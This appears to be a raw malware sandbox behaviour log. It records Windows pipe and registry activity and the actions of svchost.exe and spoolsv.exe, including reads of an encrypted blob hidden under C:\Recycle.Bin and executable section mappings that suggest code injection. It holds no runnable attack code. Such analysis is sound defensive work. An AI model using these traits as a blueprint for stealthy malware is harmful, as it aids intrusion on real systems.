File read Path: \lsarpc Offset: 0 Length: 1024 Value: 05 00 0C 03 10 00 00 00 44 00 00 00 01 00 00 00 B8 10 B8 10 FE 24 00 00 0C 00 5C 50 49 50 45 5C 6C 73 61 73 73 00 00 00 01 00 00 00 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 48 00 41 00 4E 00 55 00 45 00 4C 00 45 00 2D 00 42 00 43 00 36 00 30 00 37 00 32 00 30 00 00 00 success or wait 2216758261
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........@.......(.....,......................................... pending 2216760105
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........t.......\.....9.......P./.}O.].Q. ...................................CF..w.tC..2............................ pending 2216765962
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........,.....................P./.}O.].Q. .. pending 2216772400
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2216882212
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2216882663
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2216883901
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind buffer overflow 2216890704
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind buffer overflow 2216891241
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind success or wait 2216891769
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2216892478
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2216893716
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: EnableDHCP success or wait 2216942183
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: DhcpServer success or wait 2216942728
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: DhcpServer success or wait 2216943274
File opened Path: \Device\NetBT_Tcpip_{21861216-BE56-4763-BD46-43D214321A9E} Access: read data or list directory and write data or add file and synchronize Options: no options Attributes: normal Content Overwritten: true success or wait 2216943889
File opened Path: \Device\Afd\Endpoint Access: synchronize and generic read and generic write Options: synchronous io non alert Attributes: none Content Overwritten: true success or wait 2216945302
File opened Path: \Device\Tcp Access: synchronize and generic execute Options: synchronous io non alert Attributes: normal Content Overwritten: true success or wait 2216946573
System info set Type: TimeAdjustmentInformation Data: 0000000001420F00 success or wait 2238080596
System info queried Type: ProcessInformation success or wait 2252746445
File opened Path: \pipe\lsarpc Access: read attributes and synchronize and generic read and generic write Options: non directory file Attributes: none Content Overwritten: false success or wait 2252781967
File write Path: \lsarpc Offset: 0 Length: 72 Value: 05 00 0B 03 10 00 00 00 48 00 00 00 01 00 00 00 B8 10 B8 10 00 00 00 00 01 00 00 00 00 00 01 00 78 57 34 12 34 12 CD AB EF 00 01 23 45 67 89 AB 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 success or wait 2252802094
File read Path: \lsarpc Offset: 0 Length: 1024 Value: 05 00 0C 03 10 00 00 00 44 00 00 00 01 00 00 00 B8 10 B8 10 09 25 00 00 0C 00 5C 50 49 50 45 5C 6C 73 61 73 73 00 00 00 01 00 00 00 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 48 00 41 00 4E 00 55 00 45 00 4C 00 45 00 2D 00 42 00 43 00 36 00 30 00 37 00 32 00 30 00 00 05 success or wait 2252805018
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........@.......(.....,......................................... pending 2252806867
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........t.......\.....9.....R..W.uNN.".9..\G.................................CF..w.tC..2............................ pending 2252812721
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........,...................R..W.uNN.".9..\G pending 2252819204
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2253069847
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2253070298
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2253071533
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind buffer overflow 2253078281
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind buffer overflow 2253078817
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind success or wait 2253079441
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2253080103
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2253081347
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: EnableDHCP success or wait 2253127764
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: DhcpServer success or wait 2253128307
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: DhcpServer success or wait 2253128853
File opened Path: \Device\NetBT_Tcpip_{21861216-BE56-4763-BD46-43D214321A9E} Access: read data or list directory and write data or add file and synchronize Options: no options Attributes: normal Content Overwritten: true success or wait 2253129469
File opened Path: \Device\Afd\Endpoint Access: synchronize and generic read and generic write Options: synchronous io non alert Attributes: none Content Overwritten: true success or wait 2253130893
File opened Path: \Device\Tcp Access: synchronize and generic execute Options: synchronous io non alert Attributes: normal Content Overwritten: true success or wait 2253132153
System info set Type: TimeAdjustmentInformation Data: 0000000001420F00 success or wait 2273927029
System info queried Type: ProcessInformation success or wait 2288951236
File opened Path: \pipe\lsarpc Access: read attributes and synchronize and generic read and generic write Options: non directory file Attributes: none Content Overwritten: false success or wait 2289029124
File write Path: \lsarpc Offset: 0 Length: 72 Value: 05 00 0B 03 10 00 00 00 48 00 00 00 01 00 00 00 B8 10 B8 10 00 00 00 00 01 00 00 00 00 00 01 00 78 57 34 12 34 12 CD AB EF 00 01 23 45 67 89 AB 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 success or wait 2289032768
File read Path: \lsarpc Offset: 0 Length: 1024 Value: 05 00 0C 03 10 00 00 00 44 00 00 00 01 00 00 00 B8 10 B8 10 46 25 00 00 0C 00 5C 50 49 50 45 5C 6C 73 61 73 73 00 00 00 01 00 00 00 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 48 00 41 00 4E 00 55 00 45 00 4C 00 45 00 2D 00 42 00 43 00 36 00 30 00 37 00 32 00 30 00 00 00 success or wait 2289035664
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........@.......(.....,......................................... pending 2289037496
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........t.......\.....9.....>....{OJ...FZ.(..................................CF..w.tC..2............................ pending 2289043447
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........,...................>....{OJ...FZ.(. pending 2289049767
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2289162029
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2289162494
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2289163729
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind buffer overflow 2289170483
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind buffer overflow 2289171029
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind success or wait 2289171557
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2289172263
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2289173558
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: EnableDHCP success or wait 2289221277
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: DhcpServer success or wait 2289221833
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: DhcpServer success or wait 2289222392
File opened Path: \Device\NetBT_Tcpip_{21861216-BE56-4763-BD46-43D214321A9E} Access: read data or list directory and write data or add file and synchronize Options: no options Attributes: normal Content Overwritten: true success or wait 2289223024
File opened Path: \Device\Afd\Endpoint Access: synchronize and generic read and generic write Options: synchronous io non alert Attributes: none Content Overwritten: true success or wait 2289224470
File opened Path: \Device\Tcp Access: synchronize and generic execute Options: synchronous io non alert Attributes: normal Content Overwritten: true success or wait 2289225748
System info set Type: TimeAdjustmentInformation Data: 0000000001420F00 success or wait 2309703693
System info queried Type: ProcessInformation success or wait 2325043148
File opened Path: \pipe\lsarpc Access: read attributes and synchronize and generic read and generic write Options: non directory file Attributes: none Content Overwritten: false success or wait 2325080573
File write Path: \lsarpc Offset: 0 Length: 72 Value: 05 00 0B 03 10 00 00 00 48 00 00 00 01 00 00 00 B8 10 B8 10 00 00 00 00 01 00 00 00 00 00 01 00 78 57 34 12 34 12 CD AB EF 00 01 23 45 67 89 AB 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 success or wait 2325084113
File read Path: \lsarpc Offset: 0 Length: 1024 Value: 05 00 0C 03 10 00 00 00 44 00 00 00 01 00 00 00 B8 10 B8 10 4A 25 00 00 0C 00 5C 50 49 50 45 5C 6C 73 61 73 73 00 00 00 01 00 00 00 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 48 00 41 00 4E 00 55 00 45 00 4C 00 45 00 2D 00 42 00 43 00 36 00 30 00 37 00 32 00 30 00 00 00 success or wait 2325087037
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........@.......(.....,......................................... pending 2325088904
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........t.......\.....9......u..%Z.E.\)|.&*..................................CF..w.tC..2............................ pending 2325094702
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........,....................u..%Z.E.\)|.&*. pending 2325103115
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2325229343
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2325229780
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2325231105
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind buffer overflow 2325238055
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind buffer overflow 2325238594
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind success or wait 2325239196
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2325239912
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2325241216
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: EnableDHCP success or wait 2325290946
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: DhcpServer success or wait 2325291481
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: DhcpServer success or wait 2325292028
File opened Path: \Device\NetBT_Tcpip_{21861216-BE56-4763-BD46-43D214321A9E} Access: read data or list directory and write data or add file and synchronize Options: no options Attributes: normal Content Overwritten: true success or wait 2325292708
File opened Path: \Device\Afd\Endpoint Access: synchronize and generic read and generic write Options: synchronous io non alert Attributes: none Content Overwritten: true success or wait 2325294182
File opened Path: \Device\Tcp Access: synchronize and generic execute Options: synchronous io non alert Attributes: normal Content Overwritten: true success or wait 2325295391
System info set Type: TimeAdjustmentInformation Data: 0000000001420F00 success or wait 2345499229
System info queried Type: ProcessInformation success or wait 2361231362
File opened Path: \pipe\lsarpc Access: read attributes and synchronize and generic read and generic write Options: non directory file Attributes: none Content Overwritten: false success or wait 2361318081
File write Path: \lsarpc Offset: 0 Length: 72 Value: 05 00 0B 03 10 00 00 00 48 00 00 00 01 00 00 00 B8 10 B8 10 00 00 00 00 01 00 00 00 00 00 01 00 78 57 34 12 34 12 CD AB EF 00 01 23 45 67 89 AB 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 success or wait 2361321743
File read Path: \lsarpc Offset: 0 Length: 1024 Value: 05 00 0C 03 10 00 00 00 44 00 00 00 01 00 00 00 B8 10 B8 10 4B 25 00 00 0C 00 5C 50 49 50 45 5C 6C 73 61 73 73 00 00 00 01 00 00 00 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 48 00 41 00 4E 00 55 00 45 00 4C 00 45 00 2D 00 42 00 43 00 36 00 30 00 37 00 32 00 30 00 00 00 success or wait 2361324731
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........@.......(.....,......................................... pending 2361326131
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........t.......\.....9.........,..O.....~^..................................CF..w.tC..2............................ pending 2361332252
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........,.......................,..O.....~^. pending 2361338906
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2361517087
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2361517607
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2361518963
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind buffer overflow 2361525918
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind buffer overflow 2361526445
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind success or wait 2361526959
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2361527654
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2361528890
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: EnableDHCP success or wait 2361575508
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: DhcpServer success or wait 2361576254
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: DhcpServer success or wait 2361576960
File opened Path: \Device\NetBT_Tcpip_{21861216-BE56-4763-BD46-43D214321A9E} Access: read data or list directory and write data or add file and synchronize Options: no options Attributes: normal Content Overwritten: true success or wait 2361577716
File opened Path: \Device\Afd\Endpoint Access: synchronize and generic read and generic write Options: synchronous io non alert Attributes: none Content Overwritten: true success or wait 2361579397
File opened Path: \Device\Tcp Access: synchronize and generic execute Options: synchronous io non alert Attributes: normal Content Overwritten: true success or wait 2361580717
System info set Type: TimeAdjustmentInformation Data: 0000000001420F00 success or wait 2381298675
System info queried Type: ProcessInformation success or wait 2397394972
File opened Path: \pipe\lsarpc Access: read attributes and synchronize and generic read and generic write Options: non directory file Attributes: none Content Overwritten: false success or wait 2397521018
File write Path: \lsarpc Offset: 0 Length: 72 Value: 05 00 0B 03 10 00 00 00 48 00 00 00 01 00 00 00 B8 10 B8 10 00 00 00 00 01 00 00 00 00 00 01 00 78 57 34 12 34 12 CD AB EF 00 01 23 45 67 89 AB 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 success or wait 2397524735
File read Path: \lsarpc Offset: 0 Length: 1024 Value: 05 00 0C 03 10 00 00 00 44 00 00 00 01 00 00 00 B8 10 B8 10 90 25 00 00 0C 00 5C 50 49 50 45 5C 6C 73 61 73 73 00 00 00 01 00 00 00 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 48 00 41 00 4E 00 55 00 45 00 4C 00 45 00 2D 00 42 00 43 00 36 00 30 00 37 00 32 00 30 00 00 00 success or wait 2397527812
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........@.......(.....,......................................... pending 2397529642
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........t.......\.....9.....1r....QJ.n.O...J.................................CF..w.tC..2............................ pending 2397535681
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........,...................1r....QJ.n.O...J pending 2397542081
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind buffer overflow 2397849253
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind buffer overflow 2397849805
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind success or wait 2397850330
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: EnableDHCP success or wait 2397901209
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: DhcpServer success or wait 2397901753
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: DhcpServer success or wait 2397902297
File opened Path: \Device\NetBT_Tcpip_{21861216-BE56-4763-BD46-43D214321A9E} Access: read data or list directory and write data or add file and synchronize Options: no options Attributes: normal Content Overwritten: true success or wait 2397902913
File opened Path: \Device\Afd\Endpoint Access: synchronize and generic read and generic write Options: synchronous io non alert Attributes: none Content Overwritten: true success or wait 2397904688
File opened Path: \Device\Tcp Access: synchronize and generic execute Options: synchronous io non alert Attributes: normal Content Overwritten: true success or wait 2397906060
Analysis File: svchost.exe PID: 1144 Parent PID: 1636
Sections
+ General
Start time: 05:48:10
Start date: 01/12/2011
Path: C:\WINDOWS\system32\svchost.exe
Commandline: C:\WINDOWS\system32\svchost.exe -k LocalService
Imagebase: 0x1000000
File size: 14336 bytes
MD5 hash: 27C6D03BCDB8CFEB96B716F3D8BE3E18
Chronological sections
Operation Data Completion Time
Analysis File: spoolsv.exe PID: 1496 Parent PID: 1636
+ Sections
+ General
Start time: 05:48:11
Start date: 01/12/2011
Path: C:\WINDOWS\system32\spoolsv.exe
Commandline: C:\WINDOWS\system32\spoolsv.exe
Imagebase: 0x1000000
File size: 58880 bytes
MD5 hash: 60784F891563FB1B767F70117FC2428F
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\WINDOWS\system32\ntdll.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 5 BAD6A36
C:\Recycle.Bin\07A49F015E0D693 read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 2 BAF4E4E
C:\WINDOWS\system32\USER32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\WININET.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 11 BAD6A36
C:\WINDOWS\system32\WS2_32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\ADVAPI32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\CRYPT32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
\pipe\globpluginspipe read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 1 BADD812
+ File read
File Path Offset Length Value Completion Count Source Address
C:\Recycle.Bin\07A49F015E0D693 none 5934 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2 BAE818F
C:\WINDOWS\system32\user32.dll none 4 D8 00 00 00 success or wait 1 BAD6699
C:\WINDOWS\system32\user32.dll none 20 4C 01 04 00 1B A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BAD66D5
C:\WINDOWS\system32\user32.dll none 224 0B 01 07 0A 00 F4 05 00 00 E2 02 00 00 00 00 00 17 B2 00 00 00 10 00 00 00 B0 05 00 00 00 41 7E 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 10 09 00 00 04 00 00 76 FC 08 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 39 00 00 success or wait 1 BAD6717
C:\WINDOWS\system32\user32.dll none 160 2E 74 65 78 74 00 00 00 83 F2 05 00 00 10 00 00 00 F4 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 80 11 00 00 00 10 06 00 00 0C 00 00 00 F8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 88 A0 02 00 00 30 06 00 00 A2 02 00 success or wait 1 BAD67A2
C:\WINDOWS\system32\wininet.dll none 4 F8 00 00 00 success or wait 11 BAD6699
C:\WINDOWS\system32\wininet.dll none 20 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 11 BAD66D5
C:\WINDOWS\system32\wininet.dll none 224 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 11 BAD6717
C:\WINDOWS\system32\wininet.dll none 160 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 11 BAD67A2
C:\WINDOWS\system32\ws2_32.dll none 4 F0 00 00 00 success or wait 1 BAD6699
C:\WINDOWS\system32\ws2_32.dll none 20 4C 01 04 00 63 A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BAD66D5
C:\WINDOWS\system32\ws2_32.dll none 224 0B 01 07 0A 00 22 01 00 00 1C 00 00 00 00 00 00 73 12 00 00 00 10 00 00 00 20 01 00 00 00 AB 71 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 70 01 00 00 04 00 00 20 F0 01 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 04 14 00 00 success or wait 1 BAD6717
C:\WINDOWS\system32\ws2_32.dll none 160 2E 74 65 78 74 00 00 00 53 21 01 00 00 10 00 00 00 22 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 14 09 00 00 00 40 01 00 00 0A 00 00 00 26 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 F8 03 00 00 00 50 01 00 00 04 00 00 success or wait 1 BAD67A2
C:\WINDOWS\system32\advapi32.dll none 4 F0 00 00 00 success or wait 1 BAD6699
C:\WINDOWS\system32\advapi32.dll none 20 4C 01 04 00 48 1D 90 49 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BAD66D5
C:\WINDOWS\system32\advapi32.dll none 224 0B 01 07 0A 00 46 07 00 00 3E 02 00 00 00 00 00 0B 71 00 00 00 10 00 00 00 20 07 00 00 00 DD 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 B0 09 00 00 04 00 00 B8 5B 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 A4 16 00 00 success or wait 1 BAD6717
C:\WINDOWS\system32\advapi32.dll none 160 2E 74 65 78 74 00 00 00 C9 45 07 00 00 10 00 00 00 46 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 28 46 00 00 00 60 07 00 00 2C 00 00 00 4A 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 80 A9 01 00 00 B0 07 00 00 AA 01 00 success or wait 1 BAD67A2
C:\WINDOWS\system32\crypt32.dll none 4 F0 00 00 00 success or wait 1 BAD6699
C:\WINDOWS\system32\crypt32.dll none 20 4C 01 04 00 D7 A0 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BAD66D5
C:\WINDOWS\system32\crypt32.dll none 224 0B 01 07 0A 00 44 08 00 00 DC 00 00 00 00 00 00 32 16 00 00 00 10 00 00 00 20 08 00 00 00 A8 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 50 09 00 00 04 00 00 30 C5 09 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 9C 1A 00 00 success or wait 1 BAD6717
C:\WINDOWS\system32\crypt32.dll none 160 2E 74 65 78 74 00 00 00 C4 43 08 00 00 10 00 00 00 44 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 E8 23 00 00 00 60 08 00 00 24 00 00 00 48 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 50 67 00 00 00 90 08 00 00 68 00 00 success or wait 1 BAD67A2
Section Activities:
Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\WININET.dll write and read and execute unknown 3D930000 942080 own pid read write success or wait 1 BAE50FD
\KnownDlls\Normaliz.dll write and read and execute unknown A50000 36864 own pid read write conflicting addresses 1 BAE50FD
\KnownDlls\urlmon.dll write and read and execute unknown 78130000 1257472 own pid read write success or wait 1 BAE50FD
\KnownDlls\iertutil.dll write and read and execute unknown 3DFD0000 2002944 own pid read write success or wait 1 BAE50FD
\KnownDlls\MSIMG32.dll write and read and execute unknown 3DFD0000 2002944 own pid read write object name not found 1 BAE50FD
C:\WINDOWS\system32\msimg32.dll query and write and read and execute image 76380000 20480 own pid read write success or wait 1 BAE50FD
C:\WINDOWS\system32\ntdll.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
